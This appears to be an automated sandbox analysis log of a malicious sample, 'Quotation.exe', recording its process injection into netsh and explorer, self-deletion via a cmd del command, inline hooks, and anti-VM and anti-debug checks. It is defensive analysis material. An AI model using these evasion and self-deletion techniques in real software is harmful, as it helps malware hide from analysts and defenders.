          Source: unknownProcess created: C:\Users\user\Desktop\Quotation.exe 'C:\Users\user\Desktop\Quotation.exe'
          Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe 'C:\Users\user\Desktop\Quotation.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Quotation.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe 'C:\Users\user\Desktop\Quotation.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Quotation.exe'Jump to behavior
          Source: C:\Users\user\Desktop\Quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: Binary string: netsh.pdb source: Quotation.exe, 00000001.00000002.278705852.0000000000799000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: Quotation.exe, 00000000.00000003.232762609.000000001ED00000.00000004.00000001.sdmp, Quotation.exe, 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, netsh.exe, 00000008.00000002.498460842.0000000003460000.00000040.00000001.sdmp
          Source: Binary string: netsh.pdbGCTL source: Quotation.exe, 00000001.00000002.278705852.0000000000799000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: Quotation.exe, netsh.exe

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\Quotation.exeUnpacked PE file: 1.2.Quotation.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_00401FDC
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_0041E34F push eax; ret 1_2_0041E356
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00417CCE push 7FCF5E29h; iretd 1_2_00417CD3
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00417CD7 push ebx; retf 1_2_00417CDF
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_004164B4 push esi; ret 1_2_004164BD
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00417D58 push esp; iretd 1_2_00417D5A
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_0041CEB5 push eax; ret 1_2_0041CF08
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_0041CF6C push eax; ret 1_2_0041CF72
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_0041CF02 push eax; ret 1_2_0041CF08
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_0041CF0B push eax; ret 1_2_0041CF72
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C4D0D1 push ecx; ret 1_2_00C4D0E4
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_1_0041E34F push eax; ret 1_1_0041E356
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_1_00417CCE push 7FCF5E29h; iretd 1_1_00417CD3
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_1_00417CD7 push ebx; retf 1_1_00417CDF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034DD0D1 push ecx; ret 8_2_034DD0E4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BBE34F push eax; ret 8_2_02BBE356
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BBCEB5 push eax; ret 8_2_02BBCF08
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BBCF0B push eax; ret 8_2_02BBCF72
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BBCF02 push eax; ret 8_2_02BBCF08
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BBCF6C push eax; ret 8_2_02BBCF72
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BB64B4 push esi; ret 8_2_02BB64BD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BB7CD7 push ebx; retf 8_2_02BB7CDF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BB7CCE push 7FCF5E29h; iretd 8_2_02BB7CD3
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BB7D58 push esp; iretd 8_2_02BB7D5A
          Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xE2
          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Quotation.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Quotation.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000002BA98E4 second address: 0000000002BA98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000002BA9B5E second address: 0000000002BA9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Quotation.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Windows\explorer.exe TID: 4628Thread sleep count: 36 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 4628Thread sleep time: -72000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 6920Thread sleep time: -70000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,0_2_0040531D
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405CB0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004026BC FindFirstFileA,0_2_004026BC
          Source: explorer.exe, 00000002.00000000.256958737.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.251839029.00000000053A0000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.256579128.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.256958737.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000002.503632990.0000000003755000.00000004.00000001.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000002.503632990.0000000003755000.00000004.00000001.sdmpBinary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000002.00000000.242063875.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000002.00000000.257013480.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000000.256579128.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.251856943.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.256579128.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.257013480.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000002.00000000.256579128.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Quotation.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Quotation.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_0040ACD0 LdrLoadDll,1_2_0040ACD0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_73CA1000 YVfgfgfgfgfg,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,0_2_73CA1000
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_00401FDC
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_023D166E mov eax, dword ptr fs:[00000030h]0_2_023D166E
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_023D1886 mov eax, dword ptr fs:[00000030h]0_2_023D1886
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C8B8D0 mov eax, dword ptr fs:[00000030h]1_2_00C8B8D0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C8B8D0 mov ecx, dword ptr fs:[00000030h]1_2_00C8B8D0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C8B8D0 mov eax, dword ptr fs:[00000030h]1_2_00C8B8D0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C8B8D0 mov eax, dword ptr fs:[00000030h]1_2_00C8B8D0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C8B8D0 mov eax, dword ptr fs:[00000030h]1_2_00C8B8D0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C8B8D0 mov eax, dword ptr fs:[00000030h]1_2_00C8B8D0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF9080 mov eax, dword ptr fs:[00000030h]1_2_00BF9080
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C73884 mov eax, dword ptr fs:[00000030h]1_2_00C73884
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C73884 mov eax, dword ptr fs:[00000030h]1_2_00C73884
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF58EC mov eax, dword ptr fs:[00000030h]1_2_00BF58EC
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C220A0 mov eax, dword ptr fs:[00000030h]1_2_00C220A0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C220A0 mov eax, dword ptr fs:[00000030h]1_2_00C220A0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C220A0 mov eax, dword ptr fs:[00000030h]1_2_00C220A0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C220A0 mov eax, dword ptr fs:[00000030h]1_2_00C220A0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C220A0 mov eax, dword ptr fs:[00000030h]1_2_00C220A0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C220A0 mov eax, dword ptr fs:[00000030h]1_2_00C220A0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C390AF mov eax, dword ptr fs:[00000030h]1_2_00C390AF
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2F0BF mov ecx, dword ptr fs:[00000030h]1_2_00C2F0BF
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2F0BF mov eax, dword ptr fs:[00000030h]1_2_00C2F0BF
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2F0BF mov eax, dword ptr fs:[00000030h]1_2_00C2F0BF
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C10050 mov eax, dword ptr fs:[00000030h]1_2_00C10050
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C10050 mov eax, dword ptr fs:[00000030h]1_2_00C10050
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB2073 mov eax, dword ptr fs:[00000030h]1_2_00CB2073
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC1074 mov eax, dword ptr fs:[00000030h]1_2_00CC1074
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C77016 mov eax, dword ptr fs:[00000030h]1_2_00C77016
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C77016 mov eax, dword ptr fs:[00000030h]1_2_00C77016
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C77016 mov eax, dword ptr fs:[00000030h]1_2_00C77016
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC4015 mov eax, dword ptr fs:[00000030h]1_2_00CC4015
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC4015 mov eax, dword ptr fs:[00000030h]1_2_00CC4015
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0B02A mov eax, dword ptr fs:[00000030h]1_2_00C0B02A
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0B02A mov eax, dword ptr fs:[00000030h]1_2_00C0B02A
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0B02A mov eax, dword ptr fs:[00000030h]1_2_00C0B02A
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0B02A mov eax, dword ptr fs:[00000030h]1_2_00C0B02A
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2002D mov eax, dword ptr fs:[00000030h]1_2_00C2002D
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2002D mov eax, dword ptr fs:[00000030h]1_2_00C2002D
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2002D mov eax, dword ptr fs:[00000030h]1_2_00C2002D
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2002D mov eax, dword ptr fs:[00000030h]1_2_00C2002D
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2002D mov eax, dword ptr fs:[00000030h]1_2_00C2002D
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C841E8 mov eax, dword ptr fs:[00000030h]1_2_00C841E8
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1C182 mov eax, dword ptr fs:[00000030h]1_2_00C1C182
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2A185 mov eax, dword ptr fs:[00000030h]1_2_00C2A185
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C22990 mov eax, dword ptr fs:[00000030h]1_2_00C22990
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFB1E1 mov eax, dword ptr fs:[00000030h]1_2_00BFB1E1
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFB1E1 mov eax, dword ptr fs:[00000030h]1_2_00BFB1E1
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFB1E1 mov eax, dword ptr fs:[00000030h]1_2_00BFB1E1
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C769A6 mov eax, dword ptr fs:[00000030h]1_2_00C769A6
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C261A0 mov eax, dword ptr fs:[00000030h]1_2_00C261A0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C261A0 mov eax, dword ptr fs:[00000030h]1_2_00C261A0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C751BE mov eax, dword ptr fs:[00000030h]1_2_00C751BE
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C751BE mov eax, dword ptr fs:[00000030h]1_2_00C751BE
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C751BE mov eax, dword ptr fs:[00000030h]1_2_00C751BE
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C751BE mov eax, dword ptr fs:[00000030h]1_2_00C751BE
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1B944 mov eax, dword ptr fs:[00000030h]1_2_00C1B944
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1B944 mov eax, dword ptr fs:[00000030h]1_2_00C1B944
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF9100 mov eax, dword ptr fs:[00000030h]1_2_00BF9100
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF9100 mov eax, dword ptr fs:[00000030h]1_2_00BF9100
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF9100 mov eax, dword ptr fs:[00000030h]1_2_00BF9100
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFB171 mov eax, dword ptr fs:[00000030h]1_2_00BFB171
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFB171 mov eax, dword ptr fs:[00000030h]1_2_00BFB171
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFC962 mov eax, dword ptr fs:[00000030h]1_2_00BFC962
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C14120 mov eax, dword ptr fs:[00000030h]1_2_00C14120
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C14120 mov eax, dword ptr fs:[00000030h]1_2_00C14120
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C14120 mov eax, dword ptr fs:[00000030h]1_2_00C14120
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C14120 mov eax, dword ptr fs:[00000030h]1_2_00C14120
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C14120 mov ecx, dword ptr fs:[00000030h]1_2_00C14120
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2513A mov eax, dword ptr fs:[00000030h]1_2_00C2513A
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2513A mov eax, dword ptr fs:[00000030h]1_2_00C2513A
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C22ACB mov eax, dword ptr fs:[00000030h]1_2_00C22ACB
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF52A5 mov eax, dword ptr fs:[00000030h]1_2_00BF52A5
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF52A5 mov eax, dword ptr fs:[00000030h]1_2_00BF52A5
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF52A5 mov eax, dword ptr fs:[00000030h]1_2_00BF52A5
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF52A5 mov eax, dword ptr fs:[00000030h]1_2_00BF52A5
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF52A5 mov eax, dword ptr fs:[00000030h]1_2_00BF52A5
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C22AE4 mov eax, dword ptr fs:[00000030h]1_2_00C22AE4
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2D294 mov eax, dword ptr fs:[00000030h]1_2_00C2D294
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2D294 mov eax, dword ptr fs:[00000030h]1_2_00C2D294
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0AAB0 mov eax, dword ptr fs:[00000030h]1_2_00C0AAB0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0AAB0 mov eax, dword ptr fs:[00000030h]1_2_00C0AAB0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2FAB0 mov eax, dword ptr fs:[00000030h]1_2_00C2FAB0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBEA55 mov eax, dword ptr fs:[00000030h]1_2_00CBEA55
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C84257 mov eax, dword ptr fs:[00000030h]1_2_00C84257
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFAA16 mov eax, dword ptr fs:[00000030h]1_2_00BFAA16
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFAA16 mov eax, dword ptr fs:[00000030h]1_2_00BFAA16
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CAB260 mov eax, dword ptr fs:[00000030h]1_2_00CAB260
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CAB260 mov eax, dword ptr fs:[00000030h]1_2_00CAB260
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC8A62 mov eax, dword ptr fs:[00000030h]1_2_00CC8A62
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF5210 mov eax, dword ptr fs:[00000030h]1_2_00BF5210
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF5210 mov ecx, dword ptr fs:[00000030h]1_2_00BF5210
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF5210 mov eax, dword ptr fs:[00000030h]1_2_00BF5210
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF5210 mov eax, dword ptr fs:[00000030h]1_2_00BF5210
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C3927A mov eax, dword ptr fs:[00000030h]1_2_00C3927A
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C08A0A mov eax, dword ptr fs:[00000030h]1_2_00C08A0A
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C13A1C mov eax, dword ptr fs:[00000030h]1_2_00C13A1C
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBAA16 mov eax, dword ptr fs:[00000030h]1_2_00CBAA16
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBAA16 mov eax, dword ptr fs:[00000030h]1_2_00CBAA16
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C34A2C mov eax, dword ptr fs:[00000030h]1_2_00C34A2C
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C34A2C mov eax, dword ptr fs:[00000030h]1_2_00C34A2C
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF9240 mov eax, dword ptr fs:[00000030h]1_2_00BF9240
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF9240 mov eax, dword ptr fs:[00000030h]1_2_00BF9240
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF9240 mov eax, dword ptr fs:[00000030h]1_2_00BF9240
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF9240 mov eax, dword ptr fs:[00000030h]1_2_00BF9240
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C753CA mov eax, dword ptr fs:[00000030h]1_2_00C753CA
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C753CA mov eax, dword ptr fs:[00000030h]1_2_00C753CA
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C203E2 mov eax, dword ptr fs:[00000030h]1_2_00C203E2
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C203E2 mov eax, dword ptr fs:[00000030h]1_2_00C203E2
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C203E2 mov eax, dword ptr fs:[00000030h]1_2_00C203E2
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C203E2 mov eax, dword ptr fs:[00000030h]1_2_00C203E2
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C203E2 mov eax, dword ptr fs:[00000030h]1_2_00C203E2
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C203E2 mov eax, dword ptr fs:[00000030h]1_2_00C203E2
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1DBE9 mov eax, dword ptr fs:[00000030h]1_2_00C1DBE9
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB138A mov eax, dword ptr fs:[00000030h]1_2_00CB138A
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CAD380 mov ecx, dword ptr fs:[00000030h]1_2_00CAD380
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C01B8F mov eax, dword ptr fs:[00000030h]1_2_00C01B8F
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C01B8F mov eax, dword ptr fs:[00000030h]1_2_00C01B8F
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2B390 mov eax, dword ptr fs:[00000030h]1_2_00C2B390
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C22397 mov eax, dword ptr fs:[00000030h]1_2_00C22397
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC5BA5 mov eax, dword ptr fs:[00000030h]1_2_00CC5BA5
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C24BAD mov eax, dword ptr fs:[00000030h]1_2_00C24BAD
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C24BAD mov eax, dword ptr fs:[00000030h]1_2_00C24BAD
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C24BAD mov eax, dword ptr fs:[00000030h]1_2_00C24BAD
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC8B58 mov eax, dword ptr fs:[00000030h]1_2_00CC8B58
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C23B7A mov eax, dword ptr fs:[00000030h]1_2_00C23B7A
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C23B7A mov eax, dword ptr fs:[00000030h]1_2_00C23B7A
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB131B mov eax, dword ptr fs:[00000030h]1_2_00CB131B
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFDB60 mov ecx, dword ptr fs:[00000030h]1_2_00BFDB60
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFF358 mov eax, dword ptr fs:[00000030h]1_2_00BFF358
